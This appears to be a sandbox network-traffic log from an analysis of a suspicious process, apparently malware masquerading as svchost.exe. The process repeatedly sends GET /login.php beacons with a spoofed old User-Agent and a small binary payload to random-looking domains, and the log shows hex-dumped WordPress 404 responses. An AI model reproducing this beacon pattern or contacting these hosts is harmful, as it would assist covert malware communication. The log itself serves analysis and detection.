2024-08-23 16:43:36 UTC	1369	IN	Data Raw: 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b Data Ascii: e:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){
2024-08-23 16:43:36 UTC	1369	IN	Data Raw: 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 73 Data Ascii: ='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-default-s
2024-08-23 16:43:36 UTC	1369	IN	Data Raw: 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 Data Ascii: ht:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-height:1.2
2024-08-23 16:43:36 UTC	1369	IN	Data Raw: 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61 67 65 Data Ascii: 0404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta {line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover ,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link,.page
2024-08-23 16:43:36 UTC	1369	IN	Data Raw: 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 Data Ascii: ngle-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-single-post
2024-08-23 16:43:36 UTC	1369	IN	Data Raw: 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d 74 72 69 67 67 65 72 22 Data Ascii: focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-trigger"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	59543	188.114.96.3	443	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:43:37 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
2024-08-23 16:43:37 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:43:37 UTC	767	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:43:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=klYq6YYmcRMdbilfj26HsgXXG677Rd1h8HQd8LJL853e1aKKqyV6LuJPeXHQHUgx%2BDxhC96l05lY0x0g%2Fns99PKzV8bY%2F%2B%2B%2Be%2Bdv1wwzSBPZUng0cCtrtmBfw6hTLQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c90064ab6c44a-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:43:37 UTC	602	IN	Data Raw: 37 63 62 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e Data Ascii: 7cb1<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
2024-08-23 16:43:37 UTC	1369	IN	Data Raw: 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 Data Ascii: ound -</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http
2024-08-23 16:43:37 UTC	1369	IN	Data Raw: 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 Data Ascii: ght),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.e
2024-08-23 16:43:37 UTC	1369	IN	Data Raw: 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 Data Ascii: e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}cat
2024-08-23 16:43:37 UTC	1369	IN	Data Raw: 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 Data Ascii: ' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-def
2024-08-23 16:43:37 UTC	1369	IN	Data Raw: 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 Data Ascii: e-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-heig
2024-08-23 16:43:37 UTC	1369	IN	Data Raw: 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b Data Ascii: or:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta {line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover ,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link
2024-08-23 16:43:37 UTC	1369	IN	Data Raw: 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c Data Ascii: ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-singl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	50846	188.114.96.3	443	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-23 16:43:48 UTC	267	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Connection: Keep-Alive
2024-08-23 16:43:48 UTC	6	OUT	Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
2024-08-23 16:43:49 UTC	907	IN	HTTP/1.1 404 Not Found Date: Fri, 23 Aug 2024 16:43:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/" server-timing: amp_sanitizer;dur="45.7",amp_style_sanitizer;dur="20.2",amp_tag_and_attribute_sanitizer;dur="20.0",amp_optimizer;dur="24.9" CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eFlMBxJLc8%2FWBJ4nGdrEiwyjv3lm6z0Q0SMzfchV%2FanIcY01r%2BWxbgspeJSkXmxmbqhsSoe4%2BhKnbInsD%2BuRXLxv7M%2FxMVYiheSIHbWtMvqtUaAOiuaj4VdAa8q%2Fiw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c90497805438a-EWR alt-svc: h3=":443"; ma=86400
2024-08-23 16:43:49 UTC	462	IN	Data Raw: 37 63 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62 Data Ascii: 7c26<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
2024-08-23 16:43:49 UTC	1369	IN	Data Raw: 36 31 33 31 34 31 35 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d Data Ascii: 6131415000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-m
2024-08-23 16:43:49 UTC	1369	IN	Data Raw: 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 7b 6f 76 Data Ascii: .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{ov
